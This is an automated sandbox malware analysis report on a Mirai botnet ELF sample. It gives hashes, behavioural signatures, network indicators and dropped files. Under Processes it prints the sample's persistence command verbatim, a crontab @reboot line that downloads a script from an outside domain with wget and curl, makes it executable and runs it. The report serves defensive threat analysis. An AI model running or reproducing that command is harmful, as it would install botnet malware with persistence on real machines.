Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-h1f5hsvfpf
Target x86.elf
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
Tags
botnet mirai defense_evasion execution persistence privilege_escalatio
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615

Threat Level: Known bad

The file x86.elf was found to be: Known bad.

Malicious Activity Summary

botnet mirai defense_evasion execution persistence privilege_escalatio

Mirai family

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 07:13

Signatures

Mirai family

mirai

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 07:11

Reported

2024-10-27 07:16

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

130s

Max time network

136s

Command Line

[/tmp/x86.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/x86.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 65.21.1.106 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.P6I4MI /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd /tmp/x86.elf N/A

Processes

/tmp/x86.elf

[/tmp/x86.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
FI 65.21.1.106:53 kingstonwikkerink.dyn udp
NO 81.29.149.178:6325 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.P6I4MI

MD5 af73a255cf822f131242d4b68503af1a
SHA1 099f3aaf9df66df7f1c57d131fa7376dfacb5ae7
SHA256 0ade95a9592b514f790d7b64d6e21e15eca16ef61904db297860cf91b8d32dc0
SHA512 0a8b47b1f31a0de3dc070f26cd658338e00d0b8d79ff44bb3ad6ba3bb8e212b0abf4abe38d9dd15ef4856e4ec04b73222280dbc0dc3a88cddb0be190ce945499